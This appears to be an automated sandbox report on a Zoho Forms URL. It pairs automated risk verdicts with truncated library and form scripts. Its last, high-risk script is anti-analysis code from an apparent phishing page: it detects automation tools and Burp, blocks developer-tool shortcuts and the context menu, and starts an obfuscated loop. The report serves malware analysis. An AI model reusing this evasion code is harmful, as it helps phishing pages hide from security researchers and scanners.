Windows Analysis Report
https://zfrmz.com/hu0ngo1Ul357L1ChjHxW

```json{  "brand": "unknown",  "brand_classification": "unknown",  "legit_url": "unknown",  "similarity": 0,  "spoofed": 0,  "reasoning": "The URL 'https://zfrmz.com' does not exhibit any clear visual or structural similarities to a known brand. There are no obvious character substitutions or resemblances to well-known brand URLs. The domain name 'zfrmz' does not suggest any connection to a recognized brand, and there is no indication of typosquatting. The domain could be used for a legitimate purpose unrelated to any brand, such as a unique business or service name. Without further context or evidence of brand association, it is unlikely to be a typosquatting attempt."}

URL: https://zfrmz.com

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a localization (i18n) object containing various error messages and validation rules. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or obfuscated code. The script seems to be focused on providing user-friendly error messages and validating user input, which is a common and legitimate practice. While it uses some outdated APIs like `XDomainRequest`, the overall behavior is benign and does not raise significant security concerns. Therefore, the risk score is assessed as low (3)."
}

var i18n = 
{
"noentry":"No entry", 
"nofields":"No fields are available", 
"asterisksymbol":"*", 
"entervalue":"Enter\x20a\x20value\x20for\x20this\x20field.",
"entervaluenumber":"Enter\x20a\x20number\x20for\x20this\x20field.",
"entervaluecaptcha":"Enter\x20a\x20value\x20for\x20this\x20field.",
"entervaluerecaptcha":"Confirm\x20you\x27re\x20not\x20a\x20robot.",
"recaptchaerror":"reCAPTCHA\x20validation\x20failed.",
"entervalidmail":"Enter\x20a\x20valid\x20email\x20address.\x20\x28eg\x3A\x20yourname\x40domain.com\x29",
"entervalidnumber":"Enter\x20a\x20numeric\x20value.\x20",
"invaliddecimal":"Enter\x20a\x20valid\x20decimal\x20number.\x20",
"invalidcurrency":"Enter\x20a\x20numeric\x20value.\x20\x28currency\x29",
"invalidurl":"Enter\x20a\x20valid\x20website.\x20\x28eg\x3A\x20www.domain.com\x29",
"invalidphone":"Enter\x20a\x20valid\x20phone\x20number.\x20Allowed\x20special\x20characters\x3A\x20\x2B\x20\x2D\x20.\x20\x28\x20\x29\x20space",
"invalidinitialphone":"Enter\x20a\x20phone\x20number\x20that\x20doesnt\x20begin\x20with\x20\x2B\x20or\x20\x29.",
"invalidUSAphone":"Enter\x20a\x20valid\x20phone\x20number.",
"invalidpatternformat":"Entry\x20does\x20not\x20match\x20the\x20required\x20format.",
"invalidletterregexformat":"Only\x20letters\x20are\x20allowed.",
"invalidletterandnumregexformat":"Only\x20letters\x20and\x20numbers\x20allowed.",
"invalidletternumandspaceregexformat":"Only\x20letters,\x20numbers\x20and\x20spaces\x20are\x20allowed.",
"invalidletterandspaceregexformat":"Only\x20letters\x20and\x20spaces\x20are\x20allowed.",
"invalidcountrycode":"Enter\x20a\x20valid\x20country\x20code.",
"selectchoice":"Select\x20a\x20choice.",
"chooseoption":"Choose\x20your\x20option\x28s\x29.",
"selectdate":"Choose\x20a\x20date.",
"selectcountrycode":"Select\x20a\x20country\x20code.",
"selectrating":"Specify\x20your\x20rating\x20here.",
"selecttime":"Choose\x20a\x20time.\x20",
"checkfield":"Select\x20this\x20option.",
"choosefile":"Upload\x20a\x20file\x20here.\x20",
"contactadmin":"Please\x20contact\x20your\x20form\x20administrator\x20for\x20further\x20assistance.",
"incompletesignature":"Add\x20your\x20signature\x20here.",
"matrixchoicemandatory":"Choose\x20at\x20least\x20one\x20answer\x20for\x20each\x20question.",
"uploadsize":"File\x20size\x20should\x20be\x20less\x20than\x20\x7B0\x7D.",
"chooseval":"Choose\x20a\x20rating\x20on\x20this\x20scale.",
"select":"\x2DSelect\x2D",
"wrongverificationcode":"That\x20CAPTCHA\x20was\x20incorrect.\x20",
"incompleteinputtime":"Enter\x20time\x20in\x20\x28HH\x3AMM\x20AM\x2FPM\x29\x20format.",
"incompleteinputtimetwentyfour":"Enter\x20time\x20in\x20\x28HH\x3AMM\x29\x20format.",
"fileupload":"There\x20was\x20an\x20error\x20while\x20uploading\x20file.\x20Please\x20try\x20again.",
"formclosed":"The\x20form\x20you\x20are\x20trying\x20to\x20access\x20is\x20closed.",
"donationhintmsgmin":"Min.\x20amount\x20is\x20",
"donationhintmsgmax":"Max.\x20amount\x20is",
"donationhintmsgminmax":"Enter\x20a\x20value\x20between\x20\x7B0\x7D\x20and\x20\x7B1\x7D",
"pymnterrminamnt":"Minimum amount is {0}", 
"pymnterrmaxamnt":"Maximum amount is {0}", 
"paymentdecimallen":"You\x20are\x20only\x20allowed\x20to\x20enter\x20\x7B0\x7D\x20digits.",
"entervalidamount":"Enter\x20a\x20valid\x20amount.",
"moredecimalplaces":"You\x20are\x20allowed\x20to\x20enter\x20only\x20up\x20to\x20\x7B0\x7D\x20decimals.", 
"maxchoicelimit":"You\x20can\x20choose\x20only\x20up\x20to\x20\x7B0\x7D\x20choice\x28s\x29.", 
"minchoicelimit":"You\x20must\x20choose\x20at\x20least\x20\x7B0\x7D\x20choice\x28s\x29.", 
"allowedimg":"Only\x20the\x20following\x20file\x20types\x20are\x20supported\x3A\x20\x7B0\x7D",
"alloweddomain":"Only\x20the\x20following\x20email\x20domains\x20are\x20allowed\x3A\x20\x7B0\x7D", 
"restricteddomain":"The\x20following\x20domains\x20have\x20been\x20restricted\x3A\x20\x7B0\x7D",
"checktcfield":"You\x20must\x20accept\x20the\x20terms\x20and\x20conditions.\x20",
"chooseimg":"Choose\x20an\x20image\x20of\x20your\x20choice.",
"subformentriesminlimit"

{
    "risk_score": 5,
    "reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it does not exhibit any clear malicious intent, there are some moderate-risk indicators that warrant closer inspection. The script appears to handle various form-related functionality, including error handling, DOM manipulation, and event binding. However, the use of legacy APIs, aggressive DOM manipulation, and potential data transmission to external domains raise some concerns. Additional context and a deeper understanding of the script's purpose would be needed to provide a more definitive risk assessment."
}

var ZFFullPageForm={menuItemsSpeed:350,inputClearAnimationSpeed:500,errorHideTimeOut:4e3,errorSlideDownSpeed:100,errorSlideUpSpeed:200},ZFPageTitle={},ZFPageAnimation={animType:1,pageFadeInSpeed:600,footerFadeInSpeed:600,pageFadeOutSpeed:400,footerFadeOutSpeed:400,pageLoadSpeed:100,fieldFadeOutSpeed:500,fieldFadeInSpeed:800,pageNavbarAnimTime:400};function init(isFormLoad){ZFFullPageForm.isCssHasSupported=isCssSelectorSupportedInBrowser("div:has(input)"),floatingFormComponentsHandler(),checkAndAddMiniContClass(),ZFLive.isFormPdf||(initPageHeader(isFormLoad),window.addEventListener("unload",function(e){window.scrollTo(0,0)}),isFormLoad&&(setMaxWidthForDescriptionFieldImages($("div[elname=livefield-elem][reltype=parent]:visible:first").width()),bindWindowResizeEvent(),bindEventForClearIconShowOrHide($(ZFLive.formFormFieldsOuterWrapper)),showFormFirstPageComponents(),bindEvntInFirstPageSignatureComp($("div[elname=formBodyULName][page_no=1]"))))}function showFormFirstPageComponents(){$("div[elname=formBodyULName][page_no=1], div[elname=footer][page_no=1], div[elname=pageHdr]").animate({opacity:1},{duration:ZFPageAnimation.pageLoadSpeed,complete:function(){$(this).css("opacity","")}})}function bindWindowResizeEvent(){isMobileBrowser()?(window.matchMedia("(orientation: portrait)").addEventListener("change",function(e){hidePickerElems(),setTimeout(function(){setMatrixElemWidth($("div[elname=formWrapper]")),setMatrixElemHeight($("div[elname=formWrapper]"))},100),init(),scollPageNavElemIntoView(getCurrentActivePage())}),window.addEventListener("touchmove",function(e){setDatePickerPosition()})):window.visualViewport.addEventListener("resize",function(){setDatePickerPosition(),setTimeout(function(){setMatrixElemWidth($("div[elname=formWrapper]")),setMatrixElemHeight($("div[elname=formWrapper]"))},100),checkAndAddMiniContClass(),floatingFormComponentsHandler(),ZFLive.isThemePage&&initPageHeader()})}function hidePickerElems(){var currActiveDiv=$("div#formBodyDiv").find("div[elname=formBodyULName]:visible");if(currActiveDiv.length>0){var dateInpElems=$(currActiveDiv).find("input[elname=date],input[elname=dateTime]");if(dateInpElems.length>0){var datePickerSelectElems=$("#ui-datepicker-div").find("select:visible");datePickerSelectElems.length>0&&$(datePickerSelectElems).select2("close"),$(dateInpElems).datepicker("hide")}var selectElems=$(currActiveDiv).find("select:visible");selectElems.length>0&&($(".select2-dropdown").hide(),$(selectElems).select2("close")),$(currActiveDiv).find("div[phoneformat=INTERNATIONAL]").length>0&&window.dispatchEvent(new CustomEvent("scroll"));var zcrmField=$(currActiveDiv).find("div[comptype="+ZFFieldTypeConstants.ZOHO_CRM+"]");if($(zcrmField).length>0){var entryListingDiv=$("div[elname=crm-entry-listing-div]");if(0!=$(entryListingDiv).length&&$(entryListingDiv).is(":visible")){var entryULElem=$(entryListingDiv).find("ul[elname=entry-ul]");$(entryULElem).empty(),$(entryListingDiv).hide()}}}}function hideErrorOF(elem){var errMsgDiv=$(elem).find("div[name=errMsgDiv]"),errDiv=$(elem).find("div[name=errDiv]");$(elem).removeClass("error"),$(errMsgDiv).text(""),animateHideErrorMsgOF(errDiv)}function animateErrorMsgOF(elem){ZFUtil.findAndCloseHoverTextPopup(elem),"upload_field"===$(elem).attr("error_type")?animateUploadFieldErrorMsgOF(elem):(clearTimeout(ZFLive.onInputValErrTimeOut),$(elem).removeClass("zfErrorDivAnimate"),$(elem).hasClass("err_hiding")&&$(elem).hide(),ZFLive!=undefined&&ZFLive.preventHideOFError?$(elem).slideDown(ZFFullPageForm.errorSlideDownSpeed):1==$(elem).closest("div[elname='subFormFieldsUl']").length?$(elem).slideDown(ZFFullPageForm.errorSlideDownSpeed):($(elem).slideDown(ZFFullPageForm.errorSlideDownSpeed,function(){$(this).addClass("zfErrorDivAnimate")}),ZFLive.onInputValErrTimeOut=setTimeout(function(){animateHideErrorMsgOF(elem)},ZFFullPageForm.errorHideTimeOut)))}function animateUploadFieldErrorMsgOF(elem){ZFLive!=undefined&&ZFLive.preventHideOFError?$(elem).slideDown(ZFFullPageForm.errorSlideD

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a part of a larger library or framework, likely the jQuery UI library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or heavily obfuscated code. The script primarily focuses on providing utility functions and extensions to the jQuery library, such as handling focus, selection, and z-index manipulation. While it uses some legacy APIs like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility purposes. Overall, the script seems to be a legitimate part of a well-known and widely-used library, and the risk score is low."
}

!function(factory){"function"==typeof define&&define.amd?define(["jquery"],factory):factory(jQuery)}(function($){var uuid,removeData,eventType,orig;function focusable(element,isTabIndexNotNaN){var map,mapName,img,nodeName=element.nodeName.toLowerCase();return"area"===nodeName?(mapName=(map=element.parentNode).name,!(!element.href||!mapName||"map"!==map.nodeName.toLowerCase())&&(!!(img=$("img[usemap='#"+mapName+"']")[0])&&visible(img))):(/^(input|select|textarea|button|object)$/.test(nodeName)?!element.disabled:"a"===nodeName&&element.href||isTabIndexNotNaN)&&visible(element)}function visible(element){return $.expr.filters.visible(element)&&!$(element).parents().addBack().filter(function(){return"hidden"===$.css(this,"visibility")}).length}$.ui=$.ui||{},$.extend($.ui,{version:"1.11.4",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38}}),$.fn.extend({scrollParent:function(includeHidden){var position=this.css("position"),excludeStaticParent="absolute"===position,overflowRegex=includeHidden?/(auto|scroll|hidden)/:/(auto|scroll)/,scrollParent=this.parents().filter(function(){var parent=$(this);return(!excludeStaticParent||"static"!==parent.css("position"))&&overflowRegex.test(parent.css("overflow")+parent.css("overflow-y")+parent.css("overflow-x"))}).eq(0);return"fixed"!==position&&scrollParent.length?scrollParent:$(this[0].ownerDocument||document)},uniqueId:(uuid=0,function(){return this.each(function(){this.id||(this.id="ui-id-"+ ++uuid)})}),removeUniqueId:function(){return this.each(function(){/^ui-id-\d+$/.test(this.id)&&$(this).removeAttr("id")})}}),$.extend($.expr[":"],{data:$.expr.createPseudo?$.expr.createPseudo(function(dataName){return function(elem){return!!$.data(elem,dataName)}}):function(elem,i,match){return!!$.data(elem,match[3])},focusable:function(element){return focusable(element,!isNaN($.attr(element,"tabindex")))},tabbable:function(element){var tabIndex=$.attr(element,"tabindex"),isTabIndexNaN=isNaN(tabIndex);return(isTabIndexNaN||tabIndex>=0)&&focusable(element,!isTabIndexNaN)}}),$("<a>").outerWidth(1).jquery||$.each(["Width","Height"],function(i,name){var side="Width"===name?["Left","Right"]:["Top","Bottom"],type=name.toLowerCase(),orig={innerWidth:$.fn.innerWidth,innerHeight:$.fn.innerHeight,outerWidth:$.fn.outerWidth,outerHeight:$.fn.outerHeight};function reduce(elem,size,border,margin){return $.each(side,function(){size-=parseFloat($.css(elem,"padding"+this))||0,border&&(size-=parseFloat($.css(elem,"border"+this+"Width"))||0),margin&&(size-=parseFloat($.css(elem,"margin"+this))||0)}),size}$.fn["inner"+name]=function(size){return size===undefined?orig["inner"+name].call(this):this.each(function(){$(this).css(type,reduce(this,size)+"px")})},$.fn["outer"+name]=function(size,margin){return"number"!=typeof size?orig["outer"+name].call(this,size):this.each(function(){$(this).css(type,reduce(this,size,!0,margin)+"px")})}}),$.fn.addBack||($.fn.addBack=function(selector){return this.add(null==selector?this.prevObject:this.prevObject.filter(selector))}),$("<a>").data("a-b","a").removeData("a-b").data("a-b")&&($.fn.removeData=(removeData=$.fn.removeData,function(key){return arguments.length?removeData.call(this,$.camelCase(key)):removeData.call(this)})),$.ui.ie=!!/msie [\w.]+/.exec(navigator.userAgent.toLowerCase()),$.fn.extend({focus:(orig=$.fn.focus,function(delay,fn){return"number"==typeof delay?this.each(function(){var elem=this;setTimeout(function(){$(elem).focus(),fn&&fn.call(elem)},delay)}):orig.apply(this,arguments)}),disableSelection:(eventType="onselectstart"in document.createElement("div")?"selectstart":"mousedown",function(){return this.bind(eventType+".ui-disableSelection",function(event){event.preventDefault()})}),enableSelection:function(){return this.unbind(".ui-disableSelection")},zIndex:function(zIndex){if(zIndex!==undefined)return this.css("zIndex",zIndex);if(this.length)for(var position,value,elem=

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a part of a web form functionality, with some legacy practices and potential for aggressive DOM manipulation, but no clear indicators of malicious intent. The script focuses on handling form navigation, field focus, and accessibility-related adjustments, which are common in legitimate web applications. While some behaviors, such as the use of `XDomainRequest` and aggressive DOM manipulation, may raise minor concerns, the overall context suggests this is likely a benign script with poor implementation practices rather than a malicious one."
}

// $Id: $
/**
 * IMPORTANT NOTE: This compressed js file includes Zoho Forms Forms/Report live js.
 */
function ZFLiveFormFocusHanderOnNavigation(actionType,pageNo){this.actionType=actionType,this.pageNo=pageNo}function ZFLiveFieldFocusHander(fieldElem,forError){this.fieldElem=fieldElem,this.isDisabledField=$(fieldElem).hasClass("fieldDisabled"),this.isFocusForError=void 0!==forError&&forError}function setFocusForElementThatCannotBeFocused(focusElem,callBackOnFocus,callBackFunctionParam){if(isSfChild(focusElem)){var scrollToViewElem=$(focusElem);if("livefield-elem"!=$(focusElem).attr("elname")){var closestFieldElem=$(focusElem).closest('[elname="livefield-elem"]');$(closestFieldElem).length>0&&(scrollToViewElem=closestFieldElem)}$(scrollToViewElem)[0].scrollIntoView({behavior:"auto",block:"center"})}if(isEmbeddedForm()&&(isMobileBrowser()||isSafari()))setTimeout(function(){var hiddenInput=$("<input />");$(hiddenInput).attr("type","text"),$(hiddenInput).attr("style","position: absolute; opacity: 0; pointer-events: none"),$(focusElem).prepend(hiddenInput),$(hiddenInput).focus(),setTimeout(function(){var existingTabIndex=setTabIndexForElementAndMakeFocus(focusElem);$(hiddenInput).remove(),resetTabIndexForElementAndMakeCallBackWithTimeout(focusElem,existingTabIndex,callBackOnFocus,callBackFunctionParam)},500)},500);else{var focusTimout=0;isiOSMobileBrowser()&&(focusTimout=100),setTimeout(function(){var existingTabIndex=setTabIndexForElementAndMakeFocus(focusElem);resetTabIndexForElementAndMakeCallBackWithTimeout(focusElem,existingTabIndex,callBackOnFocus,callBackFunctionParam)},focusTimout)}}function setTabIndexForElementAndMakeFocus(focusElem){var existingTabIndex=$(focusElem).attr("tabindex");return(void 0===existingTabIndex||existingTabIndex<=0)&&$(focusElem).attr("tabindex",1),$(focusElem).focus(),existingTabIndex}function resetTabIndexForElementAndMakeCallBackWithTimeout(focusElem,existingTabIndex,callBackOnFocus,callBackFunctionParam){setTimeout(function(){void 0===existingTabIndex?$(focusElem).removeAttr("tabindex"):$(focusElem).attr("tabindex",existingTabIndex),void 0!==callBackOnFocus&&callBackOnFocus(callBackFunctionParam)},500)}function ZFFormulaCondition(){this.fieldLinkName,this.operator,this.condValue,this.is_subform_child=!1,this.result=!1,this.group_name}ZFLiveFormFocusHanderOnNavigation.prototype.setFocus=function(){if("onload"==this.actionType)this.setFocusOnLoad();else if("pageNav"==this.actionType)if(isMobileBrowser()&&isEmbeddedForm()){var firstLi=$("div[elname=formBodyULName][page_no='"+this.pageNo+"']").find("div[elname=livefield-elem]:visible").first();new ZFLiveFieldFocusHander($(firstLi),!1).focusThisFieldElement()}else this.setFocusOnPageNav()},ZFLiveFormFocusHanderOnNavigation.prototype.setFocusOnLoad=function(){$(ZFPageAnimation.scrollWindow).scrollTop(0)},ZFLiveFormFocusHanderOnNavigation.prototype.setFocusOnPageNav=function(){if(ZFLive.ShowPageTitle===PageTitleOptions.NAVIGATION_BAR&&$("#navigBar").is(":visible")){var pageNeedToBeFocused=$("div#pageTitleCont").find("p[pagenum='"+this.pageNo+"']");0==$("div#pageTitleCont").length&&(pageNeedToBeFocused=$("div#navigBar").find("div[pagenum='"+this.pageNo+"']")),$(pageNeedToBeFocused).attr("tabindex",0),setFocusForElementThatCannotBeFocused(pageNeedToBeFocused)}else if(ZFLive.ShowPageTitle===PageTitleOptions.PAGE)setFocusForElementThatCannotBeFocused($("div[elname=formBodyULName][page_no='"+this.pageNo+"']").find("div[elname=formPageHeader]:first").find("h2"));else{var firstLi=$("div[elname=formBodyULName][page_no='"+this.pageNo+"']").find("div[elname=livefield-elem]:visible").first();new ZFLiveFieldFocusHander($(firstLi),!1).focusThisFieldElement()}},ZFLiveFieldFocusHander.prototype.getParentSfElem=function(){return $(this.fieldElem).closest("div[elname=subFormFieldsUl]").closest("div[elname=livefield-elem]")},ZFLiveFieldFocusHander.prototype.setErrorForSfCard=function(sfParentElem){var rowId=getClosestParentSubFormUL(sfParentElem).attr("rowid"),thisSfCardEl

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a part of the jQuery library, which is a widely used and trusted JavaScript framework. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The script is primarily focused on providing a consistent API for DOM manipulation, event handling, and other common web development tasks. While it uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and can be considered low risk."
}

!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.5.1",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e)||(t=r(e))&&("function"!=typeof(n=v.call(t,"constructor")&&t.constructor)||a.call(n)!==l))},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e))for(n=e.length;r<n&&!1!==t.call(e[r],r,e[r]);r++);else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="sizzle"+1*new Date,p=n.document,k=0,r=0,m=ue(),x=ue(),A=ue(),N=ue(),D=function(e,t){return e===t&&(l=!0),0},j={}.hasOwnPropert

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a part of the Select2 library, which is a popular jQuery-based library for creating custom dropdown and select elements. The code is using the 'almond' AMD loader and defining a 'select2/utils' module, which contains utility functions for the library. This code does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscation. The code is primarily focused on extending and decorating the functionality of the Select2 library, which is a legitimate use case. While the code uses some legacy practices like the 'XDomainRequest' API, these pose minor risks and are not inherently malicious. Overall, this code can be considered low risk."
}

!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):jQuery)}(function(a){var b=function(){if(a&&a.fn&&a.fn.select2&&a.fn.select2.amd)var b=a.fn.select2.amd;var c;return function(){var a,c,d;b&&b.requirejs||(b?c=b:b={},function(b){function e(a,b){return u.call(a,b)}function f(a,b){var c,d,e,f,g,h,i,j,k,l,m,n=b&&b.split("/"),o=s.map,p=o&&o["*"]||{};if(a&&"."===a.charAt(0))if(b){for(g=(a=a.split("/")).length-1,s.nodeIdCompat&&w.test(a[g])&&(a[g]=a[g].replace(w,"")),a=n.slice(0,n.length-1).concat(a),k=0;k<a.length;k+=1)if("."===(m=a[k]))a.splice(k,1),k-=1;else if(".."===m){if(1===k&&(".."===a[2]||".."===a[0]))break;k>0&&(a.splice(k-1,2),k-=2)}a=a.join("/")}else 0===a.indexOf("./")&&(a=a.substring(2));if((n||p)&&o){for(k=(c=a.split("/")).length;k>0;k-=1){if(d=c.slice(0,k).join("/"),n)for(l=n.length;l>0;l-=1)if((e=o[n.slice(0,l).join("/")])&&(e=e[d])){f=e,h=k;break}if(f)break;!i&&p&&p[d]&&(i=p[d],j=k)}!f&&i&&(f=i,h=j),f&&(c.splice(0,h,f),a=c.join("/"))}return a}function g(a,c){return function(){var d=v.call(arguments,0);return"string"!=typeof d[0]&&1===d.length&&d.push(null),n.apply(b,d.concat([a,c]))}}function i(a){return function(b){q[a]=b}}function j(a){if(e(r,a)){var c=r[a];delete r[a],t[a]=!0,m.apply(b,c)}if(!e(q,a)&&!e(t,a))throw new Error("No "+a);return q[a]}function k(a){var b,c=a?a.indexOf("!"):-1;return c>-1&&(b=a.substring(0,c),a=a.substring(c+1,a.length)),[b,a]}var m,n,o,p,q={},r={},s={},t={},u=Object.prototype.hasOwnProperty,v=[].slice,w=/\.js$/;o=function(a,b){var c,d=k(a),e=d[0];return a=d[1],e&&(c=j(e=f(e,b))),e?a=c&&c.normalize?c.normalize(a,function(a){return function(b){return f(b,a)}}(b)):f(a,b):(e=(d=k(a=f(a,b)))[0],a=d[1],e&&(c=j(e))),{f:e?e+"!"+a:a,n:a,pr:e,p:c}},p={require:function(a){return g(a)},exports:function(a){var b=q[a];return void 0!==b?b:q[a]={}},module:function(a){return{id:a,uri:"",exports:q[a],config:function(a){return function(){return s&&s.config&&s.config[a]||{}}}(a)}}},m=function(a,c,d,f){var h,k,l,m,n,s,u=[],v=typeof d;if(f=f||a,"undefined"===v||"function"===v){for(c=!c.length&&d.length?["require","exports","module"]:c,n=0;n<c.length;n+=1)if("require"===(k=(m=o(c[n],f)).f))u[n]=p.require(a);else if("exports"===k)u[n]=p.exports(a),s=!0;else if("module"===k)h=u[n]=p.module(a);else if(e(q,k)||e(r,k)||e(t,k))u[n]=j(k);else{if(!m.p)throw new Error(a+" missing "+k);m.p.load(m.n,g(f,!0),i(k),{}),u[n]=q[k]}l=d?d.apply(q[a],u):void 0,a&&(h&&h.exports!==b&&h.exports!==q[a]?q[a]=h.exports:l===b&&s||(q[a]=l))}else a&&(q[a]=d)},a=c=n=function(a,c,d,e,f){if("string"==typeof a)return p[a]?p[a](c):j(o(a,c).f);if(!a.splice){if((s=a).deps&&n(s.deps,s.callback),!c)return;c.splice?(a=c,c=d,d=null):a=b}return c=c||function(){},"function"==typeof d&&(d=e,e=f),e?m(b,a,c,d):setTimeout(function(){m(b,a,c,d)},4),n},n.config=function(a){return n(a)},a._defined=q,(d=function(a,b,c){if("string"!=typeof a)throw new Error("See almond README: incorrect module build, no module name");b.splice||(c=b,b=[]),e(q,a)||e(r,a)||(r[a]=[a,b,c])}).amd={jQuery:!0}}(),b.requirejs=a,b.require=c,b.define=d)}(),b.define("almond",function(){}),b.define("jquery",[],function(){var b=a||$;return null==b&&console&&console.error&&console.error("Select2: An instance of jQuery or a jQuery-compatible library was not found. Make sure that you are including jQuery before Select2 on your web page."),b}),b.define("select2/utils",["jquery"],function(a){function b(a){var b=a.prototype,c=[];for(var d in b){"function"==typeof b[d]&&"constructor"!==d&&c.push(d)}return c}var c={Extend:function(a,b){function c(){this.constructor=a}var d={}.hasOwnProperty;for(var e in b)d.call(b,e)&&(a[e]=b[e]);return c.prototype=b.prototype,a.prototype=new c,a.__super__=b.prototype,a},Decorate:function(a,c){function d(){var b=Array.prototype.unshift,d=c.prototype.constructor.length,e=a.prototype.constructor;d>0&&(b.call(arguments,a.prototype.constructor),e=c.prototype.constructor),e.apply(this,arguments)}var f=b(c)

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

{
  "brands": "unknown"
}

{
    "risk_score": 9,
    "reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to a suspicious login page. These behaviors are highly indicative of malicious intent, such as preventing analysis, obstructing security researchers, and potentially phishing for user credentials."
}

    if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
aCqGbxcKWf = false;
(function WDDpKWEHMd() {
    let JkbyaziqxY = false;
    const cXJHXhwfwT = 100;
    setInterval(function() {
